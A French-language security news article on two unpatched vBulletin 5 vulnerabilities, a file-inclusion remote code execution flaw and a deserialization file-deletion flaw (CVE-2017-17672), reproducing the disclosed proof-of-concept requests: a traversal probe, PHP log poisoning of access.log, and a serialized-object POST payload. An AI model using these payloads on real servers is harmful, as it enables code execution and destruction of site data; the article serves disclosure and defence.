Deux failles 0-Day de vBulletin divulgués publiquement

Des chercheurs en sécurité ont découvert et divulgué des détails de deux vulnérabilités critiques non corrigées dans vBulletin un forum Internet très populaire qui pourrait permettre à un attaquant distant d’exécuter un code malveillant sur la dernière version de vBulletin.

Les vulnérabilités ont été découvertes par un chercheur de sécurité de la firme de sécurité basée en Italie TRUEL IT et un chercheur en sécurité indépendant inconnu, qui a divulgué les détails de la vulnérabilité par le programme de divulgation sécurisé SecuriTeam Beyond Security.

Les vulnérabilités affectent la version 5 du forum vBulletin qui reste encore non corrigées à ce jour.

La première vulnérabilité découverte dans vBulletin est un problème d’inclusion de fichiers qui conduit à l’exécution de code à distance, ce qui permet à un attaquant distant d’inclure un fichier à partir du serveur vBulletin et exécuter du code PHP arbitraire.

La faille d’execution de code à distance

Un attaquant non authentifié peut déclencher la vulnérabilité d’inclusion de fichiers en envoyant une requête GET à index.php avec le paramètre routestring, ce qui permet éventuellement à l’attaquant de « créer une requête spécialement conçue au serveur Vbulletin installé sous Windows OS et inclure n’importe quels les fichiers sur le serveur Web." Le chercheur a également fourni un Proof-of-Concept (PoC) pour montrer l’exploitation de la vulnérabilité.

Proof-of-Concept (PoC)

Nous pouvons vérifier si le serveur est vulnérable en envoyant la requête GET suivante:

1

/index.php?routestring=.\\

Si la reponse est

Le serveur est vulnérable.

Si nous voulons injecter un code php à tout fichier sur le serveur, nous pouvons utiliser le access.log par exemple:

1

/?LogINJ_START=<?php phpinfo();?>LogINJ_END

Après cela, nous pouvons inclure access.log avec notre code PHP:

1

/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log

La faille de suppression de fichier arbitraire à distance

La seconde vulnérabilité découverte  dans la version du logiciel forum vBulletin 5 a été attribué CVE-2017-17672 et décrit comme un problème de désérialisation qu’un attaquant non authentifié peut exploiter pour supprimer des fichiers arbitraires et même exécuter du code malveillant « dans certaines circonstances. »

Cette vulnerabilité est due à l’usage de la fonction unserialize() de PHP, ce aui permet à une personnes malveillante de supprimer des fichiers sur le serveur ou d’y executer un code.

Proof-of-Concept (PoC)

En envoyant la requête POST suite d’ un attaquant non authentifié peut supprimer des fichiers du serveur victimes

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1
Host: vb533.test
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:1

le serveur répondra avec:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

HTTP/1.1 200 OK
Date: Fri, 27 Oct 2017 09:27:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: sessionhash=409d8f4b16ebb55471e63509834d0eff; path=/; HttpOnly
Set-Cookie: lastvisit=1509096472; path=/; HttpOnly
Set-Cookie: lastactivity=1509096472; path=/; HttpOnly
Set-Cookie: sessionhash=44b1e8d2d433031ec2501649630dd8bf; path=/; HttpOnly
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 27 Oct 2017 09:27:52 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2101
Connection: close
Content-Type: application/json; charset=UTF-8

{"errors":[["unexpected_error","Cannot use object of type vB_Image_ImageMagick as array"]]}